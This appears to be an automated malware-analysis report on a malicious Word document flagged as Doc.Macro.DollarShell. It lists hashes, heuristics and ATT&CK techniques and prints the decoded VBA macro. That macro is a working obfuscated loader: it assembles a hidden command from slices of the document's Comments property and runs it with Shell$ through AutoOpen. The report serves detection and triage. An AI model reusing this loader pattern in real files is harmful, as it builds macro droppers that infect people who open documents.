Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cdfd10cc72306ef4…

MALICIOUS

Office (OLE)

99.8 KB Created: 2017-10-11 10:50:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: 692bcd2defa0275a5f36de36aec7841d SHA-1: a5827636f05a60d4db224b7765966ead83cbe986 SHA-256: cdfd10cc72306ef415649ffeb1843309a7c87b1ff166884fa5249f47f203b388
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The macros utilize a Shell() call and reference PowerShell, indicating an attempt to execute commands. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further confirms its malicious nature. The primary function appears to be downloading and executing a secondary payload via PowerShell.

Heuristics 8

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    jpBrTMNBoS = OTsFR + SVlLFWE + jdPQJCLLJj + UzRjzHF + rIrss + kosDdT + TlFQhtHJZCz + fGPwzhr
VBA.Shell$ jpBrTMNBoS, 0
End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
Sub AutoOpen()
EVjpGsLdH
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6971 bytes
SHA-256: 682fdbacf2faedfc59c6417e7435aeceddd1ac56fd4049c502e10a11b518d95d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
38 of 67 identifiers look randomly generated (e.g. 'pTlLTHlJJQu') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub EVjpGsLdH()
QiKWpSR = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5755, 139)
ioRPPc = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4632), 117)
vwwOFfwRO = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 7264), 169)
zMsVfEvVZXm = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14253), 179)
SJwKw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8086), 38)
QIohNw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7657), 125)
COFaKW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15828, 129)
pTlLTHlJJQu = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 919), 2)
jmVjtirYKHh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5027), 6)
SLSLUfzOH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 16277), 195)
WuJXfY = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14810), 69)
FOTbk = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12296), 89)
riWiMDH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11420), 174)
ZrwwOwhcuK = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13795, 76)
SsciHOKTzo = QiKWpSR + ioRPPc + vwwOFfwRO + zMsVfEvVZXm + SJwKw + QIohNw + COFaKW + pTlLTHlJJQu + jmVjtirYKHh + SLSLUfzOH + WuJXfY + FOTbk + riWiMDH + ZrwwOwhcuK
HhrhZkSWKc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6046, 73)
aKOpq = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8399), 19)
tafozPDvo = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8838), 73)
FMJoqnIC = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8884), 113)
jSIQkcjEw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12197), 80)
ftHPb = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 233), 178)
RWpiUnXftm = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12864), 115)
hnAAJIXY = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9355), 176)
WqrXPaSCZP = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4534), 123)
llrFzVs = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 9293), 87)
ulWwTitzG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11476), 141)
ciAwmwX = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 11458), 2)
qMEfRC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 15371, 168)
EKCfKD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14568, 113)
VbvvZ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 122), 96)
KZnGltS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8613, 27)
vrsijqiRPkt = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10968), 75)
pSaYt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1556), 121)
bBmmutG = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1626), 98)
dPlJEkSKtYi = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 193), 19)
jpKWIkUjM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3211, 67)
fVuEG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12547, 174)
kAVlVHmzFA = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2269, 4)
wJuTCjKiUQh = SsciHOKTzo + HhrhZkSWKc + aKOpq + tafozPDvo + FMJoqnIC + jSIQkcjEw + ftHPb + RWpiUnXftm + hnAAJIXY + WqrXPaSCZP + llrFzVs + ulWwTitzG + ciAwmwX + qMEfRC + EKCfKD + VbvvZ + KZnGltS + vrsijqiRPkt + pSaYt + bBmmutG + dPlJEkSKtYi + jpKWIkUjM + fVuEG + kAVlVHmzFA
XZGiP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 512, 10)
qGUFYH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1811, 151)
mKZksbo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13049, 16)
YoaqpwklU = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6341), 166)
QGaqjf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10769), 107)
aOibw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10125), 180)
GHuXfjzcF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8228, 90)
XBHkTDkD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 737, 89)
jjAMVlzPt = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 3582), 185)
bHscrzsbQ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9552, 46)
PIHEvqu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6890), 122)
tPBWYtKJwA = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6042), 48)
OTsFR = wJuTCjKiUQh + XZGiP + qGUFYH + mKZksbo + YoaqpwklU + QGaqjf + aOibw + GHuXfjzcF + XBHkTDkD + jjAMVlzPt + bHscrzsbQ + PIHEvqu + tPBWYtKJwA
SVlLFWE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 1277), 140)
jdPQJCLLJj = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 14415), 107)
UzRjzHF = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15645), 74)
rIrss = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5388, 119)
kosDdT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4141, 127)
TlFQhtHJZCz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9199), 7)
fGPwzhr = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6608), 1)
jpBrTMNBoS = OTsFR + SVlLFWE + jdPQJCLLJj + UzRjzHF + rIrss + kosDdT + TlFQhtHJZCz + fGPwzhr
VBA.Shell$ jpBrTMNBoS, 0
End Sub
Sub AutoOpen()
EVjpGsLdH
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.